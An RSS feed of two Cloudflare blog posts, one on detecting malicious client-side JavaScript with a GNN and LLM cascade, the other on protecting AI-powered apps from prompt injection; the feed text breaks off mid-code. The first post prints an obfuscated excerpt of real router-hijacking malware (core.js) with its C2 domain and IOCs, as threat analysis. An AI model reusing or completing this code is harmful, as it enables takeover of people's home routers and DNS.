
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Fri, 03 Apr 2026 17:07:00 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Cloudflare Client-Side Security: smarter detection, now open to everyone]]></title>
            <link>https://blog.cloudflare.com/client-side-security-open-to-everyone/</link>
            <pubDate>Mon, 30 Mar 2026 06:00:00 GMT</pubDate>
            <description><![CDATA[ We are opening our advanced Client-Side Security tools to all users, featuring a new cascading AI detection system. By combining graph neural networks and LLMs, we've reduced false positives by up to 200x while catching sophisticated zero-day exploits. ]]></description>
            <content:encoded><![CDATA[ <p>Client-side skimming attacks have a boring superpower: they can steal data without breaking anything. The page still loads. Checkout still completes. All it needs is just one malicious script tag.</p><p>If that sounds abstract, here are two recent examples of such skimming attacks:</p><ul><li><p>In January 2026, <a href="https://sansec.io/research/keylogger-major-us-bank-employees"><u>Sansec reported</u></a> a browser-side keylogger running on an employee merchandise store for a major U.S. bank, harvesting personal data, login credentials, and credit card information.</p></li><li><p>In September 2025, attackers published malicious releases of <a href="https://blog.cloudflare.com/how-cloudflares-client-side-security-made-the-npm-supply-chain-attack-a-non/"><u>widely used npm packages</u></a>. If those packages were bundled into front-end code, end users could be exposed to crypto-stealing in the browser.</p></li></ul><p>To further our goal of building a better Internet, Cloudflare established a core tenet during our <a href="https://www.cloudflare.com/innovation-week/birthday-week-2025/"><u>Birthday Week 2025</u></a>: powerful security features should be accessible <a href="https://blog.cloudflare.com/enterprise-grade-features-for-all/"><u>without requiring a sales engagement</u></a>. In pursuit of this objective, we are announcing two key changes today:</p><p>First, Cloudflare <b>Client-Side Security Advanced</b> (formerly <b>Page Shield add-on</b>) is now <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings?tabs=client-side-abuse"><u>available to self-serve</u></a> customers. 
And second, domain-based threat intelligence is now complimentary for all customers on the <a href="https://developers.cloudflare.com/page-shield/#availability"><u>free </u><b><u>Client-Side Security</u></b><u> bundle</u></a>.</p><p>In this post, we’ll explain how this product works and highlight a new AI detection system designed to identify malicious JavaScript while minimizing false alarms. We’ll also discuss several real-world applications for these tools.</p>
    <div>
      <h2>How Cloudflare Client-Side Security works</h2>
      <a href="#how-cloudflare-client-side-security-works">
        
      </a>
    </div>
    <p>Cloudflare Client-Side Security assesses 3.5 billion scripts per day, protecting 2,200 scripts per enterprise zone on average.</p><p>Under the hood, Client-Side Security collects its signals using browser reporting (for example, <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP"><u>Content Security Policy</u></a>), which means you don’t need scanners or app instrumentation to get started, and there is no latency impact on your web applications. The only prerequisite is that your traffic is proxied through Cloudflare.</p><p>Client-Side Security <b>Advanced</b> provides immediate access to powerful security features:</p><ul><li><p><b>Smarter malicious script detection:</b> Detection built on in-house machine learning is now enhanced with assessments from a Large Language Model (LLM). Read more details below.</p></li><li><p><b>Code change monitoring:</b> Continuous code change detection and monitoring is included, which is essential for meeting compliance requirements such as <a href="https://developers.cloudflare.com/page-shield/reference/pci-dss/"><u>PCI DSS v4</u></a> requirement 11.6.1.</p></li><li><p><b>Proactive blocking rules:</b> Benefit from positive content security rules that are maintained and enforced through continuous monitoring.</p></li></ul>
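    <p>To make the code change monitoring idea concrete, here is a minimal sketch of one simple way to spot changed scripts: fingerprint each script's source with SHA-256 and compare two snapshots. This is an illustration only, not a description of how Client-Side Security is implemented; the function names and the snapshot format (a mapping from script URL to source text) are assumptions made for the example.</p>

```python
import hashlib


def script_fingerprint(source: str) -> str:
    """Return the SHA-256 hex digest of a script's source text."""
    return hashlib.sha256(source.encode("utf-8")).hexdigest()


def detect_changes(previous: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Compare two {script_url: source} snapshots (hypothetical format).

    Returns the URLs that were added, removed, or whose content changed.
    """
    report: dict[str, list[str]] = {"added": [], "removed": [], "changed": []}
    for url, source in current.items():
        if url not in previous:
            report["added"].append(url)
        elif script_fingerprint(previous[url]) != script_fingerprint(source):
            report["changed"].append(url)
    report["removed"] = [url for url in previous if url not in current]
    return report
```

    <p>A byte-level hash flags every change, including harmless ones such as a vendor's version bump, which is one reason a detector that reasons about what a script does is useful on top of change tracking.</p>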
    <div>
      <h2>Detecting malicious intent JavaScripts</h2>
      <a href="#detecting-malicious-intent-javascripts">
        
      </a>
    </div>
    <p>Managing client-side security is a massive data problem. For an average enterprise zone, our systems observe approximately 2,200 unique scripts; smaller business zones frequently handle around 1,000. This volume alone is difficult to manage, but the real challenge is the volatility of the code.</p><p>Roughly a third of these scripts undergo code updates within any 30-day window. If a security team attempted to manually approve every new DOM (document object model) interaction or outbound connection, the resulting overhead would paralyze the development pipeline.</p><p>Instead, our detection strategy focuses on <i>what a script is trying to do</i>. That includes intent classification work <a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/"><u>we’ve written about previously</u></a>. In short, we analyze the script's behavior using an Abstract Syntax Tree (AST). By breaking the code down into its logical structure, we can identify patterns that signal malicious intent, regardless of how the code is obfuscated.</p>
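    <p>The claim that structure survives obfuscation can be illustrated with a small sketch. Python's standard library has no JavaScript parser, so this example uses Python's own <code>ast</code> module on Python snippets as a stand-in; the principle is the same, but it is not the parser or feature set used in production. The helper name <code>structural_signature</code> is hypothetical.</p>

```python
import ast


def structural_signature(source: str) -> list[str]:
    """List AST node type names in traversal order.

    Identifier names and literal values are ignored, so renaming
    variables or functions does not change the signature.
    """
    tree = ast.parse(source)
    return [type(node).__name__ for node in ast.walk(tree)]


# Two snippets with the same logic; the second has every name mangled.
readable = "def send(card):\n    return upload(card.number)\n"
mangled = "def _0x1a(_0x2b):\n    return _0x3c(_0x2b._0x4d)\n"

# A snippet with different logic: no function call is made.
different = "def send(card):\n    return card.number\n"

same_structure = structural_signature(readable) == structural_signature(mangled)
changed_structure = structural_signature(readable) != structural_signature(different)
```

    <p>Here <code>same_structure</code> and <code>changed_structure</code> are both true: renaming leaves the tree shape untouched, while removing the call changes it. A real detector learns from far richer structure than a flat list of node types, but the invariance to renaming is the property that matters.</p>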
    <div>
      <h2>The high cost of false positives</h2>
      <a href="#the-high-cost-of-false-positives">
        
      </a>
    </div>
    <p>Client-side security faces a different threat pattern than a Web Application Firewall (WAF). Active vulnerability scanners are deployed across the web, so a WAF constantly observes and blocks high-volume automated attacks that match known signatures. A client-side compromise (such as a breach of an origin server or a third-party vendor), by contrast, is a rare, high-impact event, and rarer still in an enterprise environment with rigorous vendor reviews and code scanning.</p><p>This rarity creates a problem. Because real attacks are infrequent, a security system’s detections are statistically more likely to be false positives. For a security team, these false alarms create fatigue and hide real threats. To solve this, we integrated a Large Language Model (LLM) into our detection pipeline, drastically reducing the false positive rate.</p>
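    <p>The base-rate effect described above can be worked through with Bayes' rule. The sketch below computes the share of alerts that are real attacks from three inputs. The numbers in the example are purely illustrative assumptions, not measured values: one malicious script per 100,000, a detector that catches 99% of them, and two candidate false positive rates.</p>

```python
def detection_precision(prevalence: float, recall: float, false_positive_rate: float) -> float:
    """Fraction of flagged scripts that are truly malicious (Bayes' rule).

    prevalence: share of all scripts that are malicious
    recall: share of malicious scripts the detector flags
    false_positive_rate: share of benign scripts the detector flags
    """
    true_alerts = prevalence * recall
    false_alerts = (1.0 - prevalence) * false_positive_rate
    total_alerts = true_alerts + false_alerts
    return true_alerts / total_alerts if total_alerts else 0.0


# Illustrative assumptions only: 1 malicious script per 100,000.
noisy = detection_precision(prevalence=1e-5, recall=0.99, false_positive_rate=0.003)
quieter = detection_precision(prevalence=1e-5, recall=0.99, false_positive_rate=0.001)
```

    <p>Under these assumptions, well under 1% of alerts are real attacks in the first case, and cutting the false positive rate to a third roughly triples that share. When attacks are this rare, lowering the false positive rate is the main lever for making alerts trustworthy.</p>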
    <div>
      <h2>Adding an LLM-based second opinion for triage</h2>
      <a href="#adding-an-llm-based-second-opinion-for-triage">
        
      </a>
    </div>
    <p>Our <a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/"><u>frontline detection engine</u></a> is a Graph Neural Network (GNN). GNNs are particularly well-suited for this task: they operate on the Abstract Syntax Tree (AST) of the JavaScript code, learning structural representations that capture execution patterns regardless of variable renaming, minification, or obfuscation. In machine learning terms, the GNN learns an embedding of the code’s graph structure that generalizes across syntactic variations of the same semantic behavior.</p><p>The GNN is tuned for high recall. We want to catch novel, zero-day threats. Its false positive rate is already low: less than 0.3% of total analyzed traffic is flagged as a false positive (FP). However, at Cloudflare’s scale of <a href="https://blog.cloudflare.com/how-cloudflares-client-side-security-made-the-npm-supply-chain-attack-a-non/"><u>3.5 billion scripts assessed daily</u></a>, even a sub-0.3% FP rate translates to a volume of false alarms that can be disruptive to customers.</p><p>The core issue is a classic class imbalance problem. While we can collect extensive malicious samples, the sheer diversity of benign JavaScript across the web is practically infinite. Heavily obfuscated but perfectly legitimate scripts (such as bot challenges, tracking pixels, ad-tech bundles, and minified framework builds) can exhibit structural patterns that overlap with malicious code in the GNN’s learned feature space. As much as we try to cover a huge variety of interesting benign cases, the model simply has not seen enough of this infinite variety during training.</p><p>This is precisely where Large Language Models (LLMs) complement the GNN. 
LLMs possess a deep semantic understanding of real-world JavaScript practices: they recognize domain-specific idioms, common framework patterns, and can distinguish sketchy-but-innocuous obfuscation from genuinely malicious intent.</p><p>Rather than replacing the GNN, we designed a cascading classifier architecture:</p><ol><li><p><b>Every script is first evaluated by the GNN</b>. If the GNN predicts the script as benign, the detection pipeline terminates immediately. <b>This incurs only the minimal latency of the GNN for the vast majority of traffic, completely bypassing the heavier computation time of the LLM</b>.</p></li><li><p>If the GNN flags the script as potentially malicious (above the decision threshold), the script is <b>forwarded to an open-source LLM</b> hosted on Cloudflare <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> for a second opinion.</p></li><li><p>The LLM, provided with a security-specialized prompt context, <b>semantically evaluates the script’s intent</b>. If it determines the script is benign, it overrides the GNN’s verdict.</p></li></ol><p>This two-stage design gives us the best of both worlds: the GNN’s high recall for structural malicious patterns, combined with the LLM’s broad semantic understanding to filter out false positives.</p>
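    <p>The three steps above can be sketched as a short control-flow example. Both models are passed in as plain callables, so this shows only the cascade logic and not either model. The names <code>gnn_score</code> and <code>llm_says_benign</code>, the 0.5 default threshold, and the choice to treat a score equal to the threshold as flagged are all assumptions made for illustration.</p>

```python
from typing import Callable


def cascade_verdict(
    script: str,
    gnn_score: Callable[[str], float],
    llm_says_benign: Callable[[str], bool],
    threshold: float = 0.5,
) -> str:
    """Return "benign" or "malicious" using a two-stage cascade.

    Stage 1 (cheap): the GNN scores every script.
    Stage 2 (expensive): the LLM is consulted only for flagged scripts
    and can override the GNN's verdict.
    """
    score = gnn_score(script)
    if score < threshold:
        # Most traffic stops here, so the LLM is never invoked.
        return "benign"
    if llm_says_benign(script):
        # Second opinion overrides a likely false positive.
        return "benign"
    return "malicious"
```

    <p>Because the second stage only ever sees what the first stage flags, the LLM can remove false positives but cannot add detections the GNN missed. That is why the cascade keeps the GNN tuned for high recall.</p>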
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/438frLuYPU51j0uhtM5foj/10c53b3b3ccc84b00c754c872ad20492/image3.png" />
          </figure><p><a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/#training-the-model-to-detect-hidden-malicious-intent"><u>As we previously explained</u></a>, our GNN is trained on publicly accessible script URLs, the same scripts any browser would fetch. The LLM inference at runtime runs entirely within Cloudflare’s network via <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> using open-source models (we currently use <code>gpt-oss-120b</code>).</p><p>As an additional safety net, every script flagged by the GNN is logged to Cloudflare <a href="https://developers.cloudflare.com/r2/"><u>R2</u></a> for later analysis. This allows us to continuously audit whether the LLM’s overrides are correct and catch any edge cases where a true attack might have been inadvertently filtered out. Yes, we dogfood our own storage products for our own ML pipeline.</p><p>The results from our internal evaluations on real production traffic are compelling. Focusing on total analyzed traffic under the JS Integrity threat category, the secondary LLM validation layer reduced false positives by nearly 3x: dropping the already low ~0.3% FP rate down to ~0.1%. When evaluating unique scripts, the impact is even more dramatic: the FP rate plummets a whopping ~200x, from ~1.39% down to just 0.007%.</p><p>At our scale, cutting the overall false positive rate by two-thirds translates to millions fewer false alarms for our customers every single day. Crucially, our True Positive (actual attack) detection capability includes a fallback mechanism: as noted above, we audit the LLM’s overrides to check for possible true attacks that were filtered by the LLM.</p><p>Because the LLM acts as a highly reliable precision filter in this pipeline, we can now afford to lower the GNN’s decision threshold, making it even more aggressive. 
This means we catch novel, highly obfuscated True Attacks that would have previously fallen just below the detection boundary, all without overwhelming customers with false alarms. In the next phase, we plan to push this even further.</p>
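    <p>The headline figures quoted above can be checked with a few lines of arithmetic. This sketch uses the approximate rates and the daily volume stated in this post. Applying the traffic-level FP rate uniformly to all 3.5 billion daily scripts is a simplifying assumption, so treat the result as an order-of-magnitude estimate.</p>

```python
SCRIPTS_PER_DAY = 3_500_000_000  # daily volume quoted in this post


def reduction_factor(rate_before: float, rate_after: float) -> float:
    """How many times smaller the false positive rate became."""
    return rate_before / rate_after


def daily_alerts_avoided(rate_before: float, rate_after: float,
                         volume: int = SCRIPTS_PER_DAY) -> int:
    """Estimated false alarms avoided per day (assumes a uniform rate)."""
    return round((rate_before - rate_after) * volume)


traffic_factor = reduction_factor(0.003, 0.001)      # ~0.3% down to ~0.1%
unique_factor = reduction_factor(0.0139, 0.00007)    # ~1.39% down to 0.007%
avoided = daily_alerts_avoided(0.003, 0.001)
```

    <p>The traffic-level reduction comes out at about 3x, the unique-script reduction at roughly 199x (consistent with the ~200x quoted), and the estimated number of false alarms avoided at about 7 million per day.</p>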
    <div>
      <h3>Catching zero-days in the wild: The <code>core.js</code> router exploit</h3>
      <a href="#catching-zero-days-in-the-wild-the-core-js-router-exploit">
        
      </a>
    </div>
    <p>This two-stage architecture is already proving its worth in the wild. Just recently, our detection pipeline flagged a novel, highly obfuscated malicious script (<code>core.js</code>) targeting users in specific regions.</p><p>In this case, the payload was engineered to commandeer home routers (specifically Xiaomi OpenWrt-based devices). Upon closer inspection via deobfuscation, the script demonstrated significant situational awareness: it queries the router's WAN configuration (dynamically adapting its payload using parameters like <code>wanType=dhcp</code>, <code>wanType=static</code>, and <code>wanType=pppoe</code>), overwrites the DNS settings to hijack traffic through Chinese public DNS servers, and even attempts to lock out the legitimate owner by silently changing the admin password. Instead of compromising a website directly, it had been injected into users' sessions via compromised browser extensions.</p><p>To evade detection, the script's core logic was heavily minified and packed using an array string obfuscator. It is a classic trick, but effective enough that traditional threat intelligence platforms like VirusTotal had not reported detections at the time of writing.</p><p><b>Our GNN successfully revealed</b> the underlying malicious structure despite the obfuscation, and the <b>Workers AI LLM confidently confirmed</b> the intent. Here is a glimpse of the payload showing the target router API and the attempt to inject a rogue DNS server:</p>
            <pre><code>const _0x1581=['bXhqw','=sSMS9WQ3RXc','cookie','qvRuU','pDhcS','WcQJy','lnqIe','oagRd','PtPlD','catch','defaultUrl','rgXPslXN','9g3KxI1b','123123123','zJvhA','content','dMoLJ','getTime','charAt','floor','wZXps','value','QBPVX','eJOgP','WElmE','OmOVF','httpOnly','split','userAgent','/?code=10&amp;asyn=0&amp;auth=','nonce=','dsgAq','VwEvU','==wb1kHb9g3KxI1b','cNdLa','W748oghc9TefbwK','_keyStr','parse','BMvDU','JYBSl','SoGNb','vJVMrgXPslXN','=Y2KwETdSl2b','816857iPOqmf','uexax','uYTur','LgIeF','OwlgF','VkYlw','nVRZT','110594AvIQbs','LDJfR','daPLo','pGkLa','nbWlm','responseText','20251212','EKjNN','65kNANAl','.js','94963VsBvZg','WuMYz','domain','tvSin','length','UBDtu','pfChN','1TYbnhd','charCodeAt','/cgi-bin/luci/api/xqsystem/login','http://192.168.','trace','https://api.qpft5.com','&amp;newPwd=','mWHpj','wanType','XeEyM','YFBnm','RbRon','xI1bxI1b','fBjZQ','shift','=8yL1kHb9g3KxI1b','http://','LhGKV','AYVJu','zXrRK','status','OQjnd','response','AOBSe','eTgcy','cEKWR','&amp;dns2=','fzdsr','filter','FQXXx','Kasen','faDeG','vYnzx','Fyuiu','379787JKBNWn','xiroy','mType','arGpo','UFKvk','tvTxu','ybLQp','EZaSC','UXETL','IRtxh','HTnda','trim','/fee','=82bv92bv92b','BGPKb','BzpiL','MYDEF','lastIndexOf','wypgk','KQMDB','INQtL','YiwmN','SYrdY','qlREc','MetQp','Wfvfh','init','/ds','HgEOZ','mfsQG','address','cDxLQ','owmLP','IuNCv','=syKxEjUS92b','then','createOffer','aCags','tJHgQ','JIoFh','setItem','ABCDEFGHJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789','Kwshb','ETDWH','0KcgeX92i0efbwK','stringify','295986XNqmjG','zfJMl','platform','NKhtt','onreadystatechange','88888888','push','cJVJO','XPOwd','gvhyl','ceZnn','fromCharCode',';Secure','452114LDbVEo','vXkmg','open','indexOf','UiXXo','yyUvu','ddp','jHYBZ','iNWCL','info','reverse','i4Q18Pro9TefbwK','mAPen','3960IiTopc','spOcD','dbKAM','ZzULq','bind','GBSxL','=A3QGRFZxZ2d','toUpperCase','AvQeJ','diWqV','iXtgM','lbQFd','iOS','zVowQ','jTeAP','wanType=dhcp&amp;autoset=1&amp;dns1=','fNKHB','nGkgt','aiEOB','d
pwWd','yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW','encode','gWYAY','mckDW','createDataChannel'];
const _0x4b08=function(_0x5cc416,_0x2b0c4c){_0x5cc416=_0x5cc416-0x1d5;let _0xd00112=_0x1581[_0x5cc416];return _0xd00112;};
(function(_0x3ff841,_0x4d6f8b){const _0x45acd8=_0x4b08;while(!![]){try{const _0x1933aa=-parseInt(_0x45acd8(0x275))*-parseInt(_0x45acd8(0x264))+-parseInt(_0x45acd8(0x1ff))+parseInt(_0x45acd8(0x25d))+-parseInt(_0x45acd8(0x297))+parseInt(_0x45acd8(0x20c))+parseInt(_0x45acd8(0x26e))+-parseInt(_0x45acd8(0x219))*parseInt(_0x45acd8(0x26c));if(_0x1933aa===_0x4d6f8b)break;else _0x3ff841['push'](_0x3ff841['shift']());}catch(_0x8e5119){_0x3ff841['push'](_0x3ff841['shift']());}}}(_0x1581,0x842ab));</code></pre>
            <p>This is exactly the kind of sophisticated, zero-day threat that a static signature-based WAF would miss but our structural and semantic AI approach catches.</p>
    <div>
      <h4>Indicators of Compromise (IOCs)</h4>
      <a href="#indicators-of-compromise-iocs">
        
      </a>
    </div>
    <ul><li><p><b>URL:</b> hxxps://ns[.]qpft5[.]com/ads/core[.]js</p></li><li><p><b>SHA-256:</b> 4f2b7d46148b786fae75ab511dc27b6a530f63669d4fe9908e5f22801dea9202</p></li><li><p><b>C2 Domain:</b> hxxps://api[.]qpft5[.]com</p></li></ul>
    <div>
      <h2>Domain-based threat intelligence free for all</h2>
      <a href="#domain-based-threat-intelligence-free-for-all">
        
      </a>
    </div>
    <p>Today we are making domain-based threat intelligence available to all Cloudflare Client-Side Security customers, regardless of whether you use the Advanced offering.</p><p>In 2025, we saw many non-enterprise customers affected by client-side attacks, particularly those customers running webshops on the Magento platform. These attacks persisted for days or even weeks after they were publicized. Small and medium-sized companies often lack the enterprise-level resources and expertise needed to maintain a high security standard.</p><p>By providing domain-based threat intelligence to everyone, we give site owners a critical, direct signal of attacks affecting their users. This information allows them to take immediate action to clean up their site and investigate potential origin compromises.</p><p>To begin, simply enable Client-Side Security with a toggle <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings?tabs=client-side-abuse"><u>in the dashboard</u></a>. We will then highlight any JavaScript or connections associated with a known malicious domain.</p>
    <div>
      <h2>Get started with Client-Side Security Advanced for PCI DSS v4</h2>
      <a href="#get-started-with-client-side-security-advanced-for-pci-dss-v4">
        
      </a>
    </div>
    <p>To learn more about Client-Side Security Advanced pricing, please visit <a href="https://www.cloudflare.com/plans/"><u>the plans page</u></a>. Before committing, we will estimate the cost based on your last month’s HTTP requests, so you know exactly what to expect.</p><p>Client-Side Security Advanced has all the tools you need to meet the requirements <a href="https://developers.cloudflare.com/page-shield/reference/pci-dss/"><u>of PCI DSS v4</u></a> as an e-commerce merchant, particularly 6.4.3 and 11.6.1. Sign up today <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings?tabs=client-side-abuse"><u>in the dashboard</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">6NYXSzUcRxDdj9UP0kouAK</guid>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Juan Miguel Cejuela</dc:creator>
        </item>
        <item>
            <title><![CDATA[AI Security for Apps is now generally available]]></title>
            <link>https://blog.cloudflare.com/ai-security-for-apps-ga/</link>
            <pubDate>Wed, 11 Mar 2026 13:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare AI Security for Apps is now generally available, providing a security layer to discover and protect AI-powered applications, regardless of the model or hosting provider. We are also making AI discovery free for all plans, to help teams find and secure shadow AI deployments. ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare’s <a href="https://www.cloudflare.com/demos/protect-ai-apps/"><u>AI Security for Apps</u></a> detects and mitigates threats to AI-powered applications. Today, we're announcing that it is generally available.</p><p>We’re shipping with new capabilities like detection for custom topics, and we're making AI endpoint discovery free for every Cloudflare customer—including those on Free, Pro, and Business plans—to give everyone visibility into where AI is deployed across their Internet-facing apps.</p><p>We're also announcing an expanded collaboration with IBM, which has chosen Cloudflare to deliver AI security to its cloud customers. And we’re partnering with Wiz to give mutual customers a unified view of their AI security posture.</p>
    <div>
      <h2>A new kind of attack surface</h2>
      <a href="#a-new-kind-of-attack-surface">
        
      </a>
    </div>
    <p>Traditional web applications have defined operations: check a bank balance, make a transfer. You can write deterministic rules to secure those interactions. </p><p>AI-powered applications and agents are different. They accept natural language and generate unpredictable responses. There's no fixed set of operations to allow or deny, because the inputs and outputs are probabilistic. Attackers can manipulate large language models to take unauthorized actions or leak sensitive data. Prompt injection, sensitive information disclosure, and unbounded consumption are just a few of the risks cataloged in the <a href="https://genai.owasp.org/llm-top-10/"><u>OWASP Top 10 for LLM Applications</u></a>.</p><p>These risks escalate as AI applications become agents. When an AI gains access to tool calls (processing refunds, modifying accounts, providing discounts, or accessing customer data), a single malicious prompt becomes an immediate security incident.</p><p>Customers tell us what they’re up against. “Most of Newfold Digital's teams are putting in their own Generative AI safeguards, but everybody is innovating so quickly that there are inevitably going to be some gaps eventually,” says Rick Radinger, Principal Systems Architect at Newfold Digital, which operates Bluehost, HostGator, and Domain.com. </p>
    <div>
      <h2>What AI Security for Apps does</h2>
      <a href="#what-ai-security-for-apps-does">
        
      </a>
    </div>
    <p>We built AI Security for Apps to address this. It sits in front of your AI-powered applications, whether you're using a third-party model or hosting your own, as part of Cloudflare's <a href="https://www.cloudflare.com/learning/cdn/glossary/reverse-proxy/"><u>reverse proxy</u></a>. It helps you (1) discover AI-powered apps across your web property, (2) detect malicious or off-policy behavior targeting those endpoints, and (3) mitigate threats via the familiar WAF rule builder. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5xpmckBUupzELjYOSx5bAF/cace1ab2ed2dd54d8d7a7ff60587ef65/BLOG-3128_2.png" />
          </figure>
    <div>
      <h3>Discovery — now free for everyone</h3>
      <a href="#discovery-now-free-for-everyone">
        
      </a>
    </div>
    <p>Before you can protect your LLM-powered applications, you need to know where they're being used. We often hear from security teams who don’t have a complete picture of AI deployments across their apps, especially as the LLM market evolves and developers swap out models and providers. </p><p>AI Security for Apps automatically identifies LLM-powered endpoints across your web properties, regardless of where they’re hosted or what the model is. Starting today, this capability is free for every Cloudflare customer, including Free, Pro, and Business plans. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2dBKhU5VNbzAePDAnaHkTK/3f6a569e495e03c3e2afca4d6183e02d/image4.png" />
          </figure><p><sup><i>Cloudflare’s dashboard page of web assets, showing 2 example endpoints labelled as </i></sup><code><sup><i>cf-llm</i></sup></code></p><p>Discovering these endpoints automatically requires more than matching common path patterns like <code>/chat/completions</code>. Many AI-powered applications don't have a chat interface: think product search, property valuation tools, or recommendation engines. We built a <a href="https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/#discovering-llm-powered-applications"><u>detection system that looks at how endpoints behave</u></a>, not what they're called. To confidently identify AI-powered endpoints, <a href="https://developers.cloudflare.com/api-shield/security/api-discovery/#requirements"><u>sufficient valid traffic</u></a> is required.</p><p>AI-powered endpoints that have been discovered will be visible under <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/web-assets"><u>Security → Web Assets</u></a>, labeled as <code>cf-llm</code>. For customers on a Free plan, endpoint discovery is initiated when you first navigate to the <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/web-assets/discovery"><u>Discovery page</u></a>. For customers on a paid plan, discovery occurs automatically in the background on a recurring basis. If your AI-powered endpoints have been discovered, you can review them immediately.</p>
    <div>
      <h3>Detection</h3>
      <a href="#detection">
        
      </a>
    </div>
    <p>AI Security for Apps detections follow the <a href="https://developers.cloudflare.com/waf/detections/"><u>always-on approach</u></a> for traffic to your AI-powered endpoints. Each prompt is run through multiple detection modules for prompt injection, PII exposure, and sensitive or toxic topics. The results—whether the prompt was malicious or not—are attached as metadata you can use in custom WAF rules to enforce your policies. We are continuously exploring ways to leverage our global network, which sees traffic from roughly <a href="https://w3techs.com/technologies/history_overview/proxy/all"><u>20% of the web</u></a>, to identify new attack patterns across millions of sites before they reach yours.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7oGjcaUL5L9zlAkz8lSmXv/4354a9555135e19de5c93d3d113e6790/BLOG-3128_4.png" />
          </figure>
    <div>
      <h4>New in GA: Custom topics detection</h4>
      <a href="#new-in-ga-custom-topics-detection">
        
      </a>
    </div>
    <p>The product ships with built-in detection for common threats: prompt injections, <a href="https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/#detecting-prompts-designed-to-leak-pii"><u>PII extraction</u></a>, and <a href="https://blog.cloudflare.com/block-unsafe-llm-prompts-with-firewall-for-ai/"><u>toxic topics</u></a>. But every business has its own definition of what's off-limits. A financial services company might need to detect discussions of specific securities. A healthcare company might need to flag conversations that touch on patient data. A retailer might want to know when customers are asking about competitor products.</p><p>The new custom topics feature lets you define these categories. You specify the topic; we inspect the prompt and output a relevance score that you can use to log, block, or otherwise handle the request however you decide. Our goal is to build an extensible tool that flexes to your use cases.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1WzPhy11ZmUXDGZjft4sY1/7ebfafaf2114eaba83a829694837fc2c/image1.png" />
          </figure><p><sup><i>Prompt relevance score inside of AI Security for Apps</i></sup></p>
    <div>
      <h4>New in GA: Custom prompt extraction</h4>
      <a href="#new-in-ga-custom-prompt-extraction">
        
      </a>
    </div>
    <p>AI Security for Apps enforces guardrails before unsafe prompts can reach your infrastructure. To run detections accurately and provide real-time protection, we first need to identify the prompt within the request payload. Prompts can live anywhere in a request body, and different LLM providers structure their APIs differently. OpenAI and most providers use <code>$.messages[*].content</code> for chat completions. Anthropic's batch API nests prompts inside <code>$.requests[*].params.messages[*].content</code>. Your custom property valuation tool might use <code>$.property_description</code>.</p><p>Out of the box, we support the standard formats used by OpenAI, Anthropic, Google Gemini, Mistral, Cohere, xAI, DeepSeek, and others. When we can't match a known pattern, we apply a default-secure posture and run detection on the entire request body. This can introduce false positives when the payload contains fields that are sensitive but don't feed directly to an AI model. For example, a <code>$.customer_name</code> field alongside the actual prompt might trigger PII detection unnecessarily.</p><p>Soon, you'll be able to define your own JSONPath expressions to tell us exactly where to find the prompt. This will reduce false positives and lead to more accurate detections. We're also building a prompt-learning capability that will automatically adapt to your application's structure over time.</p>
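    <p>As a rough illustration of the extraction logic described above, the sketch below looks for prompts at the two JSONPath locations named in this section and falls back to the whole body when neither matches. It is a simplified model, not the product's implementation: it walks the parsed JSON by hand instead of using a JSONPath library, only handles string <code>content</code> values, and all function names are hypothetical.</p>

```python
import json
from typing import Any


def _as_list(value: Any) -> list:
    """Return value if it is a list, otherwise an empty list."""
    return value if isinstance(value, list) else []


def _message_contents(messages: Any) -> list[str]:
    """Collect string "content" fields from a list of message objects."""
    return [m["content"] for m in _as_list(messages)
            if isinstance(m, dict) and isinstance(m.get("content"), str)]


def extract_prompts(body: str) -> list[str]:
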